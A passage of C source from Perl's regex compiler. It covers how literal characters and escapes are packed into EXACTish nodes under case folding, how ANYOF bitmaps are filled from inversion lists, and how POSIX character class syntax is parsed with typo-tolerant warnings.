* definition. (It still may be an escape sequence that evaluates
* to a single character) */
STRLEN len = 0;
UV ender = 0;
char *p;
char *s;
/* This allows us to fill a node with just enough spare so that if the final
* character folds, its expansion is guaranteed to fit */
#define MAX_NODE_STRING_SIZE (255-UTF8_MAXBYTES_CASE)
char *s0;
U8 upper_parse = MAX_NODE_STRING_SIZE;
/* We start out as an EXACT node, even if under /i, until we find a
* character which is in a fold. The algorithm now segregates into
* separate nodes, characters that fold from those that don't under
* /i. (This hopefully will create nodes that are fixed strings
* even under /i, giving the optimizer something to grab on to.)
* So, if a node has something in it and the next character is in
* the opposite category, that node is closed up, and the function
* returns. Then regatom is called again, and a new node is
* created for the new category. */
U8 node_type = EXACT;
/* Assume the node will be fully used; the excess is given back at
* the end. We can't make any other length assumptions, as a byte
* input sequence could shrink down. */
Ptrdiff_t initial_size = STR_SZ(256);
bool next_is_quantifier;
char * oldp = NULL;
/* We can convert EXACTF nodes to EXACTFU if they contain only
* characters that match identically regardless of the target
* string's UTF8ness. The reason to do this is that EXACTF is not
* trie-able, EXACTFU is, and EXACTFU requires fewer operations at
* runtime.
*
* Similarly, we can convert EXACTFL nodes to EXACTFLU8 if they
* contain only above-Latin1 characters (hence must be in UTF8),
* which don't participate in folds with Latin1-range characters,
* as the latter's folds aren't known until runtime. */
bool maybe_exactfu = FOLD && (DEPENDS_SEMANTICS || LOC);
/* Single-character EXACTish nodes are almost always SIMPLE. This
* allows us to override this as encountered */
U8 maybe_SIMPLE = SIMPLE;
/* Does this node contain something that can't match unless the
* target string is (also) in UTF-8 */
bool requires_utf8_target = FALSE;
/* The sequence 'ss' is problematic in non-UTF-8 patterns. */
bool has_ss = FALSE;
/* So is the MICRO SIGN */
bool has_micro_sign = FALSE;
/* Allocate an EXACT node. The node_type may change below to
* another EXACTish node, but since the size of the node doesn't
* change, it works */
ret = regnode_guts(pRExC_state, node_type, initial_size, "exact");
FILL_NODE(ret, node_type);
RExC_emit++;
s = STRING(REGNODE_p(ret));
s0 = s;
reparse:
/* This breaks under rare circumstances. If folding, we do not
* want to split a node at a character that is a non-final in a
* multi-char fold, as an input string could just happen to want to
* match across the node boundary. The code at the end of the loop
* looks for this, and backs off until it finds not such a
* character, but it is possible (though extremely, extremely
* unlikely) for all characters in the node to be non-final fold
* ones, in which case we just leave the node fully filled, and
* hope that it doesn't match the string in just the wrong place */
assert( ! UTF /* Is at the beginning of a character */
|| UTF8_IS_INVARIANT(UCHARAT(RExC_parse))
|| UTF8_IS_START(UCHARAT(RExC_parse)));
/* Here, we have a literal character. Find the maximal string of
* them in the input that we can fit into a single EXACTish node.
* We quit at the first non-literal or when the node gets full, or
* under /i the categorization of folding/non-folding character
* changes */
for (p = RExC_parse; len < upper_parse && p < RExC_end; ) {
/* In most cases each iteration adds one byte to the output.
* The exceptions override this */
Size_t added_len = 1;
oldp = p;
/* White space has already been ignored */
assert( (RExC_flags & RXf_PMf_EXTENDED) == 0
|| ! is_PATWS_safe((p), RExC_end, UTF));
switch ((U8)*p) {
case '^':
case '$':
case '.':
case '[':
case '(':
case ')':
case '|':
goto loopdone;
case '\\':
/* Literal Escapes Switch
This switch is meant to handle escape sequences that
resolve to a literal character.
Every escape sequence that represents something
else, like an assertion or a char class, is handled
in the switch marked 'Special Escapes' above in this
routine, but also has an entry here as anything that
isn't explicitly mentioned here will be treated as
an unescaped equivalent literal.
*/
switch ((U8)*++p) {
/* These are all the special escapes. */
case 'A': /* Start assertion */
case 'b': case 'B': /* Word-boundary assertion*/
case 'C': /* Single char !DANGEROUS! */
case 'd': case 'D': /* digit class */
case 'g': case 'G': /* generic-backref, pos assertion */
case 'h': case 'H': /* HORIZWS */
case 'k': case 'K': /* named backref, keep marker */
case 'p': case 'P': /* Unicode property */
case 'R': /* LNBREAK */
case 's': case 'S': /* space class */
case 'v': case 'V': /* VERTWS */
case 'w': case 'W': /* word class */
case 'X': /* eXtended Unicode "combining
character sequence" */
case 'z': case 'Z': /* End of line/string assertion */
--p;
goto loopdone;
/* Anything after here is an escape that resolves to a
literal. (Except digits, which may or may not)
*/
case 'n':
ender = '\n';
p++;
break;
case 'N': /* Handle a single-code point named character. */
RExC_parse = p + 1;
if (! grok_bslash_N(pRExC_state,
NULL, /* Fail if evaluates to
anything other than a
single code point */
&ender, /* The returned single code
point */
NULL, /* Don't need a count of
how many code points */
flagp,
RExC_strict,
depth)
) {
if (*flagp & NEED_UTF8)
FAIL("panic: grok_bslash_N set NEED_UTF8");
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* Here, it wasn't a single code point. Go close
* up this EXACTish node. The switch() prior to
* this switch handles the other cases */
RExC_parse = p = oldp;
goto loopdone;
}
p = RExC_parse;
RExC_parse = parse_start;
/* The \N{} means the pattern, if previously /d,
* becomes /u. That means it can't be an EXACTF node,
* but an EXACTFU */
if (node_type == EXACTF) {
node_type = EXACTFU;
/* If the node already contains something that
* differs between EXACTF and EXACTFU, reparse it
* as EXACTFU */
if (! maybe_exactfu) {
len = 0;
s = s0;
goto reparse;
}
}
break;
case 'r':
ender = '\r';
p++;
break;
case 't':
ender = '\t';
p++;
break;
case 'f':
ender = '\f';
p++;
break;
case 'e':
ender = ESC_NATIVE;
p++;
break;
case 'a':
ender = '\a';
p++;
break;
case 'o':
{
UV result;
const char* error_msg;
bool valid = grok_bslash_o(&p,
RExC_end,
&result,
&error_msg,
TO_OUTPUT_WARNINGS(p),
(bool) RExC_strict,
TRUE, /* Output warnings
for non-
portables */
UTF);
if (! valid) {
RExC_parse = p; /* going to die anyway; point
to exact spot of failure */
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(p - 1);
ender = result;
break;
}
case 'x':
{
UV result = UV_MAX; /* initialize to erroneous
value */
const char* error_msg;
bool valid = grok_bslash_x(&p,
RExC_end,
&result,
&error_msg,
TO_OUTPUT_WARNINGS(p),
(bool) RExC_strict,
TRUE, /* Silence warnings
for non-
portables */
UTF);
if (! valid) {
RExC_parse = p; /* going to die anyway; point
to exact spot of failure */
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(p - 1);
ender = result;
if (ender < 0x100) {
#ifdef EBCDIC
if (RExC_recode_x_to_native) {
ender = LATIN1_TO_NATIVE(ender);
}
#endif
}
break;
}
case 'c':
p++;
ender = grok_bslash_c(*p, TO_OUTPUT_WARNINGS(p));
UPDATE_WARNINGS_LOC(p);
p++;
break;
case '8': case '9': /* must be a backreference */
--p;
/* we have an escape like \8 which cannot be an octal escape
* so we exit the loop, and let the outer loop handle this
* escape which may or may not be a legitimate backref. */
goto loopdone;
case '1': case '2': case '3':case '4':
case '5': case '6': case '7':
/* When we parse backslash escapes there is ambiguity
* between backreferences and octal escapes. Any escape
* from \1 - \9 is a backreference, any multi-digit
* escape which does not start with 0 and which when
* evaluated as decimal could refer to an already
* parsed capture buffer is a back reference. Anything
* else is octal.
*
* Note this implies that \118 could be interpreted as
* 118 OR as "\11" . "8" depending on whether there
* were 118 capture buffers defined already in the
* pattern. */
/* NOTE, RExC_npar is 1 more than the actual number of
* parens we have seen so far, hence the "<" as opposed
* to "<=" */
if ( !isDIGIT(p[1]) || S_backref_value(p, RExC_end) < RExC_npar)
{ /* Not to be treated as an octal constant, go
find backref */
--p;
goto loopdone;
}
/* FALLTHROUGH */
case '0':
{
I32 flags = PERL_SCAN_SILENT_ILLDIGIT;
STRLEN numlen = 3;
ender = grok_oct(p, &numlen, &flags, NULL);
p += numlen;
if ( isDIGIT(*p) /* like \08, \178 */
&& ckWARN(WARN_REGEXP)
&& numlen < 3)
{
reg_warn_non_literal_string(
p + 1,
form_short_octal_warning(p, numlen));
}
}
break;
case '\0':
if (p >= RExC_end)
FAIL("Trailing \\");
/* FALLTHROUGH */
default:
if (isALPHANUMERIC(*p)) {
/* An alpha followed by '{' is going to fail next
* iteration, so don't output this warning in that
* case */
if (! isALPHA(*p) || *(p + 1) != '{') {
ckWARN2reg(p + 1, "Unrecognized escape \\%.1s"
" passed through", p);
}
}
goto normal_default;
} /* End of switch on '\' */
break;
case '{':
/* Trying to gain new uses for '{' without breaking too
* much existing code is hard. The solution currently
* adopted is:
* 1) If there is no ambiguity that a '{' should always
* be taken literally, at the start of a construct, we
* just do so.
* 2) If the literal '{' conflicts with our desired use
* of it as a metacharacter, we die. The deprecation
* cycles for this have come and gone.
* 3) If there is ambiguity, we raise a simple warning.
* This could happen, for example, if the user
* intended it to introduce a quantifier, but slightly
* misspelled the quantifier. Without this warning,
* the quantifier would silently be taken as a literal
* string of characters instead of a meta construct */
if (len || (p > RExC_start && isALPHA_A(*(p - 1)))) {
if ( RExC_strict
|| ( p > parse_start + 1
&& isALPHA_A(*(p - 1))
&& *(p - 2) == '\\')
|| new_regcurly(p, RExC_end))
{
RExC_parse = p + 1;
vFAIL("Unescaped left brace in regex is "
"illegal here");
}
ckWARNreg(p + 1, "Unescaped left brace in regex is"
" passed through");
}
goto normal_default;
case '}':
case ']':
if (p > RExC_parse && RExC_strict) {
ckWARN2reg(p + 1, "Unescaped literal '%c'", *p);
}
/*FALLTHROUGH*/
default: /* A literal character */
normal_default:
if (! UTF8_IS_INVARIANT(*p) && UTF) {
STRLEN numlen;
ender = utf8n_to_uvchr((U8*)p, RExC_end - p,
&numlen, UTF8_ALLOW_DEFAULT);
p += numlen;
}
else
ender = (U8) *p++;
break;
} /* End of switch on the literal */
/* Here, have looked at the literal character, and <ender>
* contains its ordinal; <p> points to the character after it.
* */
if (ender > 255) {
REQUIRE_UTF8(flagp);
}
/* We need to check if the next non-ignored thing is a
* quantifier. Move <p> to after anything that should be
* ignored, which, as a side effect, positions <p> for the next
* loop iteration */
skip_to_be_ignored_text(pRExC_state, &p,
FALSE /* Don't force to /x */ );
/* If the next thing is a quantifier, it applies to this
* character only, which means that this character has to be in
* its own node and can't just be appended to the string in an
* existing node, so if there are already other characters in
* the node, close the node with just them, and set up to do
* this character again next time through, when it will be the
* only thing in its new node */
next_is_quantifier = LIKELY(p < RExC_end)
&& UNLIKELY(ISMULT2(p));
if (next_is_quantifier && LIKELY(len)) {
p = oldp;
goto loopdone;
}
/* Ready to add 'ender' to the node */
if (! FOLD) { /* The simple case, just append the literal */
not_fold_common:
if (UVCHR_IS_INVARIANT(ender) || ! UTF) {
*(s++) = (char) ender;
}
else {
U8 * new_s = uvchr_to_utf8((U8*)s, ender);
added_len = (char *) new_s - s;
s = (char *) new_s;
if (ender > 255) {
requires_utf8_target = TRUE;
}
}
}
else if (LOC && is_PROBLEMATIC_LOCALE_FOLD_cp(ender)) {
/* Here are folding under /l, and the code point is
* problematic. If this is the first character in the
* node, change the node type to folding. Otherwise, if
* this is the first problematic character, close up the
* existing node, so can start a new node with this one */
if (! len) {
node_type = EXACTFL;
RExC_contains_locale = 1;
}
else if (node_type == EXACT) {
p = oldp;
goto loopdone;
}
/* This problematic code point means we can't simplify
* things */
maybe_exactfu = FALSE;
/* Here, we are adding a problematic fold character.
* "Problematic" in this context means that its fold isn't
* known until runtime. (The non-problematic code points
* are the above-Latin1 ones that fold to also all
* above-Latin1. Their folds don't vary no matter what the
* locale is.) But here we have characters whose fold
* depends on the locale. We just add in the unfolded
* character, and wait until runtime to fold it */
goto not_fold_common;
}
else /* regular fold; see if actually is in a fold */
if ( (ender < 256 && ! IS_IN_SOME_FOLD_L1(ender))
|| (ender > 255
&& ! _invlist_contains_cp(PL_in_some_fold, ender)))
{
/* Here, folding, but the character isn't in a fold.
*
* Start a new node if previous characters in the node were
* folded */
if (len && node_type != EXACT) {
p = oldp;
goto loopdone;
}
/* Here, continuing a node with non-folded characters. Add
* this one */
goto not_fold_common;
}
else { /* Here, does participate in some fold */
/* If this is the first character in the node, change its
* type to folding. Otherwise, if this is the first
* folding character in the node, close up the existing
* node, so can start a new node with this one. */
if (! len) {
node_type = compute_EXACTish(pRExC_state);
}
else if (node_type == EXACT) {
p = oldp;
goto loopdone;
}
if (UTF) { /* Use the folded value */
if (UVCHR_IS_INVARIANT(ender)) {
*(s)++ = (U8) toFOLD(ender);
}
else {
ender = _to_uni_fold_flags(
ender,
(U8 *) s,
&added_len,
FOLD_FLAGS_FULL | ((ASCII_FOLD_RESTRICTED)
? FOLD_FLAGS_NOMIX_ASCII
: 0));
s += added_len;
if ( ender > 255
&& LIKELY(ender != GREEK_SMALL_LETTER_MU))
{
/* U+B5 folds to the MU, so its possible for a
* non-UTF-8 target to match it */
requires_utf8_target = TRUE;
}
}
}
else {
/* Here is non-UTF8. First, see if the character's
* fold differs between /d and /u. */
if (PL_fold[ender] != PL_fold_latin1[ender]) {
maybe_exactfu = FALSE;
}
#if UNICODE_MAJOR_VERSION > 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && ( UNICODE_DOT_VERSION > 0) \
|| UNICODE_DOT_DOT_VERSION > 0)
/* On non-ancient Unicode versions, this includes the
* multi-char fold SHARP S to 'ss' */
if ( UNLIKELY(ender == LATIN_SMALL_LETTER_SHARP_S)
|| ( isALPHA_FOLD_EQ(ender, 's')
&& len > 0
&& isALPHA_FOLD_EQ(*(s-1), 's')))
{
/* Here, we have one of the following:
* a) a SHARP S. This folds to 'ss' only under
* /u rules. If we are in that situation,
* fold the SHARP S to 'ss'. See the comments
* for join_exact() as to why we fold this
* non-UTF at compile time, and no others.
* b) 'ss'. When under /u, there's nothing
* special needed to be done here. The
* previous iteration handled the first 's',
* and this iteration will handle the second.
* If, on the otherhand it's not /u, we have
* to exclude the possibility of moving to /u,
* so that we won't generate an unwanted
* match, unless, at runtime, the target
* string is in UTF-8.
* */
has_ss = TRUE;
maybe_exactfu = FALSE; /* Can't generate an
EXACTFU node (unless we
already are in one) */
if (UNLIKELY(ender == LATIN_SMALL_LETTER_SHARP_S)) {
maybe_SIMPLE = 0;
if (node_type == EXACTFU) {
*(s++) = 's';
/* Let the code below add in the extra 's' */
ender = 's';
added_len = 2;
}
}
}
#endif
else if (UNLIKELY(ender == MICRO_SIGN)) {
has_micro_sign = TRUE;
}
*(s++) = (DEPENDS_SEMANTICS)
? (char) toFOLD(ender)
/* Under /u, the fold of any character in
* the 0-255 range happens to be its
* lowercase equivalent, except for LATIN
* SMALL LETTER SHARP S, which was handled
* above, and the MICRO SIGN, whose fold
* requires UTF-8 to represent. */
: (char) toLOWER_L1(ender);
}
} /* End of adding current character to the node */
len += added_len;
if (next_is_quantifier) {
/* Here, the next input is a quantifier, and to get here,
* the current character is the only one in the node. */
goto loopdone;
}
} /* End of loop through literal characters */
/* Here we have either exhausted the input or ran out of room in
* the node. (If we encountered a character that can't be in the
* node, transfer is made directly to <loopdone>, and so we
* wouldn't have fallen off the end of the loop.) In the latter
* case, we artificially have to split the node into two, because
* we just don't have enough space to hold everything. This
* creates a problem if the final character participates in a
* multi-character fold in the non-final position, as a match that
* should have occurred won't, due to the way nodes are matched,
* and our artificial boundary. So back off until we find a non-
* problematic character -- one that isn't at the beginning or
* middle of such a fold. (Either it doesn't participate in any
* folds, or appears only in the final position of all the folds it
* does participate in.) A better solution with far fewer false
* positives, and that would fill the nodes more completely, would
* be to actually have available all the multi-character folds to
* test against, and to back-off only far enough to be sure that
* this node isn't ending with a partial one. <upper_parse> is set
* further below (if we need to reparse the node) to include just
* up through that final non-problematic character that this code
* identifies, so when it is set to less than the full node, we can
* skip the rest of this */
if (FOLD && p < RExC_end && upper_parse == MAX_NODE_STRING_SIZE) {
PERL_UINT_FAST8_T backup_count = 0;
const STRLEN full_len = len;
assert(len >= MAX_NODE_STRING_SIZE);
/* Here, <s> points to just beyond where we have output the
* final character of the node. Look backwards through the
* string until find a non- problematic character */
if (! UTF) {
/* This has no multi-char folds to non-UTF characters */
if (ASCII_FOLD_RESTRICTED) {
goto loopdone;
}
while (--s >= s0 && IS_NON_FINAL_FOLD(*s)) {
backup_count++;
}
len = s - s0 + 1;
}
else {
/* Point to the first byte of the final character */
s = (char *) utf8_hop_back((U8 *) s, -1, (U8 *) s0);
while (s >= s0) { /* Search backwards until find
a non-problematic char */
if (UTF8_IS_INVARIANT(*s)) {
/* There are no ascii characters that participate
* in multi-char folds under /aa. In EBCDIC, the
* non-ascii invariants are all control characters,
* so don't ever participate in any folds. */
if (ASCII_FOLD_RESTRICTED
|| ! IS_NON_FINAL_FOLD(*s))
{
break;
}
}
else if (UTF8_IS_DOWNGRADEABLE_START(*s)) {
if (! IS_NON_FINAL_FOLD(EIGHT_BIT_UTF8_TO_NATIVE(
*s, *(s+1))))
{
break;
}
}
else if (! _invlist_contains_cp(
PL_NonFinalFold,
valid_utf8_to_uvchr((U8 *) s, NULL)))
{
break;
}
/* Here, the current character is problematic in that
* it does occur in the non-final position of some
* fold, so try the character before it, but have to
* special case the very first byte in the string, so
* we don't read outside the string */
s = (s == s0) ? s -1 : (char *) utf8_hop((U8 *) s, -1);
backup_count++;
} /* End of loop backwards through the string */
/* If there were only problematic characters in the string,
* <s> will point to before s0, in which case the length
* should be 0, otherwise include the length of the
* non-problematic character just found */
len = (s < s0) ? 0 : s - s0 + UTF8SKIP(s);
}
/* Here, have found the final character, if any, that is
* non-problematic as far as ending the node without splitting
* it across a potential multi-char fold. <len> contains the
* number of bytes in the node up-to and including that
* character, or is 0 if there is no such character, meaning
* the whole node contains only problematic characters. In
* this case, give up and just take the node as-is. We can't
* do any better */
if (len == 0) {
len = full_len;
} else {
/* Here, the node does contain some characters that aren't
* problematic. If we didn't have to backup any, then the
* final character in the node is non-problematic, and we
* can take the node as-is */
if (backup_count == 0) {
goto loopdone;
}
else if (backup_count == 1) {
/* If the final character is problematic, but the
* penultimate is not, back-off that last character to
* later start a new node with it */
p = oldp;
goto loopdone;
}
/* Here, the final non-problematic character is earlier
* in the input than the penultimate character. What we do
* is reparse from the beginning, going up only as far as
* this final ok one, thus guaranteeing that the node ends
* in an acceptable character. The reason we reparse is
* that we know how far in the character is, but we don't
* know how to correlate its position with the input parse.
* An alternate implementation would be to build that
* correlation as we go along during the original parse,
* but that would entail extra work for every node, whereas
* this code gets executed only when the string is too
* large for the node, and the final two characters are
* problematic, an infrequent occurrence. Yet another
* possible strategy would be to save the tail of the
* string, and the next time regatom is called, initialize
* with that. The problem with this is that unless you
* back off one more character, you won't be guaranteed
* regatom will get called again, unless regbranch,
* regpiece ... are also changed. If you do back off that
* extra character, so that there is input guaranteed to
* force calling regatom, you can't handle the case where
* just the first character in the node is acceptable. I
* (khw) decided to try this method which doesn't have that
* pitfall; if performance issues are found, we can do a
* combination of the current approach plus that one */
upper_parse = len;
len = 0;
s = s0;
goto reparse;
}
} /* End of verifying node ends with an appropriate char */
loopdone: /* Jumped to when encounters something that shouldn't be
in the node */
/* Free up any over-allocated space; cast is to silence bogus
* warning in MS VC */
change_engine_size(pRExC_state,
- (Ptrdiff_t) (initial_size - STR_SZ(len)));
/* I (khw) don't know if you can get here with zero length, but the
* old code handled this situation by creating a zero-length EXACT
* node. Might as well be NOTHING instead */
if (len == 0) {
OP(REGNODE_p(ret)) = NOTHING;
}
else {
/* If the node type is EXACT here, check to see if it
* should be EXACTL, or EXACT_ONLY8. */
if (node_type == EXACT) {
if (LOC) {
node_type = EXACTL;
}
else if (requires_utf8_target) {
node_type = EXACT_ONLY8;
}
} else if (FOLD) {
if ( UNLIKELY(has_micro_sign || has_ss)
&& (node_type == EXACTFU || ( node_type == EXACTF
&& maybe_exactfu)))
{ /* These two conditions are problematic in non-UTF-8
EXACTFU nodes. */
assert(! UTF);
node_type = EXACTFUP;
}
else if (node_type == EXACTFL) {
/* 'maybe_exactfu' is deliberately set above to
* indicate this node type, where all code points in it
* are above 255 */
if (maybe_exactfu) {
node_type = EXACTFLU8;
}
else if (UNLIKELY(
_invlist_contains_cp(PL_HasMultiCharFold, ender)))
{
/* A character that folds to more than one will
* match multiple characters, so can't be SIMPLE.
* We don't have to worry about this with EXACTFLU8
* nodes just above, as they have already been
* folded (since the fold doesn't vary at run
* time). Here, if the final character in the node
* folds to multiple, it can't be simple. (This
* only has an effect if the node has only a single
* character, hence the final one, as elsewhere we
* turn off simple for nodes whose length > 1 */
maybe_SIMPLE = 0;
}
}
else if (node_type == EXACTF) { /* Means is /di */
/* If 'maybe_exactfu' is clear, then we need to stay
* /di. If it is set, it means there are no code
* points that match differently depending on UTF8ness
* of the target string, so it can become an EXACTFU
* node */
if (! maybe_exactfu) {
RExC_seen_d_op = TRUE;
}
else if ( isALPHA_FOLD_EQ(* STRING(REGNODE_p(ret)), 's')
|| isALPHA_FOLD_EQ(ender, 's'))
{
/* But, if the node begins or ends in an 's' we
* have to defer changing it into an EXACTFU, as
* the node could later get joined with another one
* that ends or begins with 's' creating an 'ss'
* sequence which would then wrongly match the
* sharp s without the target being UTF-8. We
* create a special node that we resolve later when
* we join nodes together */
node_type = EXACTFU_S_EDGE;
}
else {
node_type = EXACTFU;
}
}
if (requires_utf8_target && node_type == EXACTFU) {
node_type = EXACTFU_ONLY8;
}
}
OP(REGNODE_p(ret)) = node_type;
STR_LEN(REGNODE_p(ret)) = len;
RExC_emit += STR_SZ(len);
/* If the node isn't a single character, it can't be SIMPLE */
if (len > (Size_t) ((UTF) ? UVCHR_SKIP(ender) : 1)) {
maybe_SIMPLE = 0;
}
*flagp |= HASWIDTH | maybe_SIMPLE;
}
Set_Node_Length(REGNODE_p(ret), p - parse_start - 1);
RExC_parse = p;
{
/* len is STRLEN which is unsigned, need to copy to signed */
IV iv = len;
if (iv < 0)
vFAIL("Internal disaster");
}
} /* End of label 'defchar:' */
break;
} /* End of giant switch on input character */
/* Position parse to next real character */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
if ( *RExC_parse == '{'
&& OP(REGNODE_p(ret)) != SBOL && ! regcurly(RExC_parse))
{
if (RExC_strict || new_regcurly(RExC_parse, RExC_end)) {
RExC_parse++;
vFAIL("Unescaped left brace in regex is illegal here");
}
ckWARNreg(RExC_parse + 1, "Unescaped left brace in regex is"
" passed through");
}
return(ret);
}
STATIC void
S_populate_ANYOF_from_invlist(pTHX_ regnode *node, SV** invlist_ptr)
{
/* Uses the inversion list '*invlist_ptr' to populate the ANYOF 'node'. It
* sets up the bitmap and any flags, removing those code points from the
* inversion list, setting it to NULL should it become completely empty */
dVAR;
PERL_ARGS_ASSERT_POPULATE_ANYOF_FROM_INVLIST;
assert(PL_regkind[OP(node)] == ANYOF);
/* There is no bitmap for this node type */
if (OP(node) == ANYOFH) {
return;
}
ANYOF_BITMAP_ZERO(node);
if (*invlist_ptr) {
/* This gets set if we actually need to modify things */
bool change_invlist = FALSE;
UV start, end;
/* Start looking through *invlist_ptr */
invlist_iterinit(*invlist_ptr);
while (invlist_iternext(*invlist_ptr, &start, &end)) {
UV high;
int i;
if (end == UV_MAX && start <= NUM_ANYOF_CODE_POINTS) {
ANYOF_FLAGS(node) |= ANYOF_MATCHES_ALL_ABOVE_BITMAP;
}
/* Quit if are above what we should change */
if (start >= NUM_ANYOF_CODE_POINTS) {
break;
}
change_invlist = TRUE;
/* Set all the bits in the range, up to the max that we are doing */
high = (end < NUM_ANYOF_CODE_POINTS - 1)
? end
: NUM_ANYOF_CODE_POINTS - 1;
for (i = start; i <= (int) high; i++) {
if (! ANYOF_BITMAP_TEST(node, i)) {
ANYOF_BITMAP_SET(node, i);
}
}
}
invlist_iterfinish(*invlist_ptr);
/* Done with loop; remove any code points that are in the bitmap from
* *invlist_ptr; similarly for code points above the bitmap if we have
* a flag to match all of them anyways */
if (change_invlist) {
_invlist_subtract(*invlist_ptr, PL_InBitmap, invlist_ptr);
}
if (ANYOF_FLAGS(node) & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
_invlist_intersection(*invlist_ptr, PL_InBitmap, invlist_ptr);
}
/* If have completely emptied it, remove it completely */
if (_invlist_len(*invlist_ptr) == 0) {
SvREFCNT_dec_NN(*invlist_ptr);
*invlist_ptr = NULL;
}
}
}
/* Parse POSIX character classes: [[:foo:]], [[=foo=]], [[.foo.]].
Character classes ([:foo:]) can also be negated ([:^foo:]).
Returns a named class id (ANYOF_XXX) if successful, -1 otherwise.
Equivalence classes ([=foo=]) and composites ([.foo.]) are parsed,
but trigger failures because they are currently unimplemented. */
#define POSIXCC_DONE(c) ((c) == ':')
#define POSIXCC_NOTYET(c) ((c) == '=' || (c) == '.')
#define POSIXCC(c) (POSIXCC_DONE(c) || POSIXCC_NOTYET(c))
#define MAYBE_POSIXCC(c) (POSIXCC(c) || (c) == '^' || (c) == ';')
#define WARNING_PREFIX "Assuming NOT a POSIX class since "
#define NO_BLANKS_POSIX_WARNING "no blanks are allowed in one"
#define SEMI_COLON_POSIX_WARNING "a semi-colon was found instead of a colon"
#define NOT_MEANT_TO_BE_A_POSIX_CLASS (OOB_NAMEDCLASS - 1)
/* 'posix_warnings' and 'warn_text' are names of variables in the following
* routine. q.v. */
#define ADD_POSIX_WARNING(p, text) STMT_START { \
if (posix_warnings) { \
if (! RExC_warn_text ) RExC_warn_text = \
(AV *) sv_2mortal((SV *) newAV()); \
av_push(RExC_warn_text, Perl_newSVpvf(aTHX_ \
WARNING_PREFIX \
text \
REPORT_LOCATION, \
REPORT_LOCATION_ARGS(p))); \
} \
} STMT_END
#define CLEAR_POSIX_WARNINGS() \
STMT_START { \
if (posix_warnings && RExC_warn_text) \
av_clear(RExC_warn_text); \
} STMT_END
#define CLEAR_POSIX_WARNINGS_AND_RETURN(ret) \
STMT_START { \
CLEAR_POSIX_WARNINGS(); \
return ret; \
} STMT_END
STATIC int
S_handle_possible_posix(pTHX_ RExC_state_t *pRExC_state,
const char * const s, /* Where the putative posix class begins.
Normally, this is one past the '['. This
parameter exists so it can be somewhere
besides RExC_parse. */
char ** updated_parse_ptr, /* Where to set the updated parse pointer, or
NULL */
AV ** posix_warnings, /* Where to place any generated warnings, or
NULL */
const bool check_only /* Don't die if error */
)
{
/* This parses what the caller thinks may be one of the three POSIX
* constructs:
* 1) a character class, like [:blank:]
* 2) a collating symbol, like [. .]
* 3) an equivalence class, like [= =]
* In the latter two cases, it croaks if it finds a syntactically legal
* one, as these are not handled by Perl.
*
* The main purpose is to look for a POSIX character class. It returns:
* a) the class number
* if it is a completely syntactically and semantically legal class.
* 'updated_parse_ptr', if not NULL, is set to point to just after the
* closing ']' of the class
* b) OOB_NAMEDCLASS
* if it appears that one of the three POSIX constructs was meant, but
* its specification was somehow defective. 'updated_parse_ptr', if
* not NULL, is set to point to the character just after the end
* character of the class. See below for handling of warnings.
* c) NOT_MEANT_TO_BE_A_POSIX_CLASS
* if it doesn't appear that a POSIX construct was intended.
* 'updated_parse_ptr' is not changed. No warnings nor errors are
* raised.
*
* In b) there may be errors or warnings generated. If 'check_only' is
* TRUE, then any errors are discarded. Warnings are returned to the
* caller via an AV* created into '*posix_warnings' if it is not NULL. If
* instead it is NULL, warnings are suppressed.
*
* The reason for this function, and its complexity is that a bracketed
* character class can contain just about anything. But it's easy to
* mistype the very specific posix class syntax but yielding a valid
* regular bracketed class, so it silently gets compiled into something
* quite unintended.
*
* The solution adopted here maintains backward compatibility except that
* it adds a warning if it looks like a posix class was intended but
* improperly specified. The warning is not raised unless what is input
* very closely resembles one of the 14 legal posix classes. To do this,
* it uses fuzzy parsing. It calculates how many single-character edits it
* would take to transform what was input into a legal posix class. Only
* if that number is quite small does it think that the intention was a
* posix class. Obviously these are heuristics, and there will be cases
* where it errs on one side or another, and they can be tweaked as
* experience informs.
*
* The syntax for a legal posix class is:
*
* qr/(?xa: \[ : \^? [[:lower:]]{4,6} : \] )/
*
* What this routine considers syntactically to be an intended posix class
* is this (the comments indicate some restrictions that the pattern
* doesn't show):
*
* qr/(?x: \[? # The left bracket, possibly
* # omitted
* \h* # possibly followed by blanks
* (?: \^ \h* )? # possibly a misplaced caret
* [:;]? # The opening class character,
* # possibly omitted. A typo
* # semi-colon can also be used.
* \h*
* \^? # possibly a correctly placed
* # caret, but not if there was also
* # a misplaced one
* \h*
* .{3,15} # The class name. If there are
* # deviations from the legal syntax,
* # its edit distance must be close
* # to a real class name in order
* # for it to be considered to be
* # an intended posix class.
* \h*
* [[:punct:]]? # The closing class character,
* # possibly omitted. If not a colon
* # nor semi colon, the class name
* # must be even closer to a valid
* # one
* \h*
* \]? # The right bracket, possibly
* # omitted.
* )/
*
* In the above, \h must be ASCII-only.
*
* These are heuristics, and can be tweaked as field experience dictates.
* There will be cases when someone didn't intend to specify a posix class
* that this warns as being so. The goal is to minimize these, while
* maximizing the catching of things intended to be a posix class that
* aren't parsed as such.
*/
const char* p = s;
const char * const e = RExC_end;
unsigned complement = 0; /* If to complement the class */
bool found_problem = FALSE; /* Assume OK until proven otherwise */
bool has_opening_bracket = FALSE;
bool has_opening_colon = FALSE;
int class_number = OOB_NAMEDCLASS; /* Out-of-bounds until find
valid class */
const char * possible_end = NULL; /* used for a 2nd parse pass */
const char* name_start; /* ptr to class name first char */
/* If the number of single-character typos the input name is away from a
* legal name is no more than this number, it is considered to have meant
* the legal name */
int max_distance = 2;
/* to store the name. The size determines the maximum length before we
* decide that no posix class was intended. Should be at least
* sizeof("alphanumeric") */
UV input_text[15];
STATIC_ASSERT_DECL(C_ARRAY_LENGTH(input_text) >= sizeof "alphanumeric");
PERL_ARGS_ASSERT_HANDLE_POSSIBLE_POSIX;
CLEAR_POSIX_WARNINGS();
if (p >= e) {
return NOT_MEANT_TO_BE_A_POSIX_CLASS;
}
if (*(p - 1) != '[') {
ADD_POSIX_WARNING(p, "it doesn't start with a '['");
found_problem = TRUE;
}
else {
has_opening_bracket = TRUE;
}
/* They could be confused and think you can put spaces between the
* components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
